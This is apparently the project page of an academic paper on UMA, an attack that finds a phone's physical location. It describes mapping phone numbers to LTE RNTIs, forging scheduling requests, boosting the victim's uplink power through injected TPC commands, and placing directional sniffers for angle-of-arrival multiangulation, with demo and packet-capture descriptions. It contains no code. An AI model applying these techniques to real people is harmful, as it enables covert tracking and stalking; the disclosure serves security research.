Enabling Physical Localization of Uncooperative Cellular Devices

Taekkyung Oh, Sangwook Bae, Junho Ahn, Yonghwa Lee, Tuan Dinh Hoang, Min Suk Kang, Nils Ole Tippenhauer, Yongdae Kim

Overview

To trace the physical location of cellular devices in practical environments, an unprivileged attacker utilizing Angle-of-Arrival (AoA) measurement would face several challenges:
C1) The attacker can launch the attack only when the victim generates uplink traffic.
C2) The victim may transmit a very weak signal when it is close to the cell tower.
C3) Network entities such as repeaters may confuse the direction-finding of the signal.

To overcome the practical challenges, we present the UMA (Uncooperative Multiangulation Attack). The UMA allows the unprivileged attacker to successfully determine the victim's physical location (from online identity), by integrating the following solutions:
S1) The attacker forces the victim to transmit traffic continuously and fixes the victim's RNTI.
S2) The attacker boosts the victim’s signal strength to the maximum.
S3) The attacker uniquely distinguishes traffic from the victim and the repeaters.

UMA

Sol.0) Online Identity to RNTI

To obtain RNTI associated with a representative online identity, phone number, we adopt a traffic pattern design that involves over three call/SMS trials with 6 seconds time gap. Given the traffic pattern and the target’s online identity, we conduct the RNTI acquisition process in a crowded commercial network with a total of 862 active users detected over an hour. Specifically, we use COTS devices, specifically iPhone 14 Pro as the sender and Galaxy S10 5G as the receiver. Upon conducting the examination ten times, we achieve a 100% success rate in distinguishing the target's RNTIs from others.

Sol.1) Scheduling Manipulation Attack

Scheduling manipulation attack aims to fix the target's RNTI and force their unintended uplink traffic. It exploits vulnerabilities in the PHY and MAC layer protocols, specifically targeting the Scheduling Request and Buffer Status Report (BSR) mechanisms. By forging the victim's uplink channel and injecting fake messages into the eNB, the attacker prompts the eNB to allocate uplink grants to the victim, even when it has no actual data to transmit.

We evaluate the scheduling manipulation attack against 9 COTS devices. As a result, we confirm that the target UE's RNTI remains unchanged and its unintended uplink transmission is successfully triggered during the attack.

Sol.2) Power Boosting Attack

Power boosting attack aims to increase the target UE's uplink transmission power to overcome the attacker's shadow area, by exploiting the vulnerability of Transmit Power Control (TPC) command. A shadow area is a location where the unprivileged attacker cannot detect the victim’s uplink signal due to their low transmission power. For example, when the UE is located close to the eNB, the signal path loss is lower, resulting in a decrease in its transmission power. The key idea is to inject manipulated subframes into the victim UE, which contain TPC command set to increase the victim UE’s transmission power.

We evaluate the power boosting attack against Galaxy Note FE, Galaxy Note 10 5G, Galaxy S10 5G, Galaxy S20, Galaxy Z Flip 4, and LG G8. As a result, we confirm that the power boosting attack successfully increases the target UE's transmission power to the maximum level (22-23dBm).

Sol.3) Defeating Cellular Repeater

The attacker can utilize the power boosting attack to overcome the challenge cased by the cellular repeater. The cellular repeater makes the attacker mistakenly estimate the repeater's location as the victim's location.

By observing the contrasting increase in signal strength between the UE and repeater after performing the power boosting attack, the attacker can successfully differentiate the victim's signal and accurately determine the victim's location. This is achievable because the repeater has the inherent behavior of constantly amplifying the input signal to its maximum capacity. This results in unchanged uplink signal power at the repeater side even after the power boosting attack. Whereas, the victim's uplink signal would be amplified due to the power boosting attack.

End-to-End Demo

(please wait until the video box loads and play videos in high definition)

A total of six steps were conducted sequentially for end-to-end evaluation.

v3_e2e_demo2.mp4

Demo in commercial testbed

We demonstrate the combined attack of scheduling manipulation and power boosting using 3 COTS devices in a commercial LTE testbed (comprising an industry-grade LTE solution from Nokia in 5m X 7m shielded room, established by a national institute). This demonstration aims to show the attack feasibility in real-world environments.

Experimental Setup (Commercial testbed)

Video

(please wait until the video boxes load and play videos in high definition)

DEMO #1

S10_demo.mp4

Scheduling manipulation attack + Power boosting attack against Samsung Galaxy S10 5G (Samsung Exynos baseband).

DEMO #2

S20_demo.mp4

Scheduling manipulation attack + Power boosting attack against Samsung Galaxy S20 (Qualcomm Snapdragon baseband).

DEMO #3

ZFlip_demo.mp4

Scheduling manipulation attack + Power boosting attack against Samsung Galaxy Z Flip 4 (Qualcomm Snapdragon baseband).

Real-world deployment

(please wait until the video box loads and play videos in high definition)

Here's some exciting news!! Using a vehicle-mounted version of UMA, we caught smartphones used for vishing crime. The video below shows the moment we found the criminal's phone with the Korean Police.

MobiCom_investigation.mp4

Packet capture during scheduling manipulation

Wireshark captures of uplink traffic at the srsENB provide empirical evidence of the attack's effectiveness.

This figure shows captured uplink packets during scheduling manipulation at the srsENB. Note that PHY layer messages (i.e., scheduling request and DCI 0) are not visible in Wireshark captures. This demonstrates the results of executing steps 3 and 4 in scheduling manipulation four times consecutively. Packets #674, 676, 679, and 682 correspond to the attacker's transmissions, while the remaining messages represent the victim UE’s transmissions.

Detail of the attacker's packet (#674)

This is the MAC layer packet (#674) sent by the attacker. The Service Data Unit (SDU) field contains arbitrary data sent by the attacker. This data transmission is consistent with the attacker's fake scheduling request indicating the victim's RNTI has buffered data. The fake BSR indicates that the victim UE has additional data (171 - 200 bytes) to transmit in its buffer, prompting the eNB to allocate uplink resources to the victim's RNTI.

Detail of the victim's packet (#675)

This is the MAC layer packet (# 675) sent by the victim, transmitted in response to allocated multiple uplink grants through the DCI 0 message. BS=0 means no more data to transmit in its buffer. Padding represents the uplink data transmitted by the victim to fill the allocated remaining data space.

Additional materials

LTE channel sniffer

To get hands-on experience with the localization attack with multiangulation, we first build the sniffer. Then, to examine the performance of the attack in the wild, we conduct localization in the commercial cellular network.

Note that we do not use specialized hardware such as LTEye. Instead, we use a parabolic antenna to eavesdrop on RF signals of downlink and uplink channels. The resulting LTE channel sniffer runs on an Intel Core i5 desktop with SDR. The left channel of the USRP is used for the downlink channel eavesdropping, and the right channel is for the uplink channel eavesdropping. A directional antenna is mounted on the uplink channel of the USRP, and both channels share the same clock.

Localization in the wild

Estimated location of the UE using three sniffers

Angular accuracy

Distance accuracy

Using the LTE channel sniffer, we conduct localization with three sniffers and use a COTS device (iGalaxy S10) as a target. The sniffers and the UE are deployed in the same cellular coverage. The experiment is performed in a Line-of-Sight (LoS) environment of 100m X 100m size and we deploy three sniffers, as denoted by the purple square in left figure. The UE is deployed at 30m intervals in nine places, shown as red circles.

First, we estimate the direction of the strongest uplink signal detected at each sniffer while rotating the directional antenna (i.e., AoA measurement). Then, we perform multiangulation based on AoA measurements of each sniffer to predict the location of the UE. The predictions for the UE's location at each point are denoted as three yellow crosses in left figure. Since we already know the location of the sniffers, we could estimate the location of the target UE in coordinate units.

We evaluate the performance of AoA measurements with a cumulative density function (CDF) of angular error. The maximum angular error of AoA is about 8 degrees and the minimum angular error is about 4 degrees, as shown in middle figure. This might include human error during the process of rotating the antenna and estimating the direction of the strongest uplink signal. Then, we evaluate the performance of location predictions with a CDF of distance error. As shown in right figure, the maximum distance error is about 14m and the minimum distance error is about 10m. When two sniffers are used to estimate the location of an UE, it shows better localization performance than the case of combining the measurements of three sniffers.

Shadow area: Impact of the UE's position

Arrival signal strength according to the distance between UE and sniffer

We measure the arrival signal strength at the sniffer, which runs on a 10Mhz bandwidth LTE channel in an 800Mhz band. We use a COTS device, Samsung Galaxy S10, as the victim's UE. Both the UE and the sniffer are connected to the commercial network and located within the same commercial cell coverage in an urban environment. In this experiment, we set the parabolic antenna mounted on the sniffer to direct to the UE. To calculate the signal strength, we take an average of the monitored strength at the sniffer over 2,000 subframes during each measurement trial.

First, we consider the case in which the UE is located far from the eNB. We place the UE 90m away from the eNB. We then place the sniffer in the middle of the eNB and the UE. The sniffer measures the arrival signal strength every 10m between the eNB and the UE. Second, we consider the case when the UE is located close to the eNB, in contrast to the first case. For this, we place the UE 10m away from the eNB. The sniffer is situated 20m from the eNB, which is 10m from the UE. Then, we measure the signal strength at the sniffer by placing it every 10m up to 80m from the UE.

In the figure, orange-colored and blue-colored lines show the measured signal strength at the sniffer. The red box in the figure represents the detection threshold, and it was determined by measuring signal strength when uplink signals do not exist. When the UE is far from the eNB (orange line), the attacker's sniffer is able to detect the victim's uplink signals well, more than 80m away from the UE. However, when the UE is close to the eNB (blue line), the sniffer can no longer detect the victim's uplink signals in the case the sniffer is situated more than 70m away from the UE. This is because the UE transmits its uplink data with lower signal power when the UE is located close to eNB.

Impact of the UE 's behavior

Arrival signal strength by the UE's behavior

We investigate the impact of a UE's behavior on the attacker's sniffer, the UE using the three behaviors employed in the previous experiment (i.e., voice call, web surfing, and bulk uploading). In this experiment, we place the sniffer 45m away from an eNB. We then measure the arrival signal strength by moving the UE from 10m to 150m away from the sniffer at intervals of 10m.

Figure shows the measured signal strength at the attacker's sniffer over three types of the UE's behavior. The attacker's sniffer easily detects the uplink signals when the UE is doing bulk uploads or making voice calls. On the other hand, the measured signal strength during web surfing is lower than the others, which causes the attacker to fail in detecting the signal when the UE is more than 60m away from the sniffer.

Sniffer Deployment

Sniffer deployment in three-sectorized LTE cell

Here we present a simple strategy in conducting UMA in the real-world environment considering practical issues. One of several sniffers used for multiangulation should be placed nearby an eNB, as a reference point. This is because if the victim is located nearby the eNB, the victim’s UE transmits uplink data with low signal power.

After AoA measurement at the reference point, the attacker can place one or two sniffers at other points based on the estimated direction at the reference point. In general, an LTE cell consists of three sector sites, and each sector is in charge of 120º range of radio networks (i.e., 3 × 120º). Thus, the attacker can place the sniffers in one sector range as shown in the figure. If the attacker tries three-dimensional localization, it is recommended to use three sniffers for multiangulation. Otherwise, using only two sniffers is enough since we have empirically confirmed that it shows better performance for two-dimensional localization. Finally, when the shadow area occurs during the localization attack, the attacker can enforce the victim’s UE to increase transmission power by exploiting power boosting attack.

Paper information

Oh et al., "Enabling Physical Localization of Uncooperative Cellular Devices," International Conference on Mobile Computing and Networking (ACM MobiCom), 2024.
- Official MobiCom paper link: https://doi.org/10.1145/3636534.3690709
- Pre-print version of paper: https://arxiv.org/pdf/2403.14963

Page updated

Google Sites

Report abuse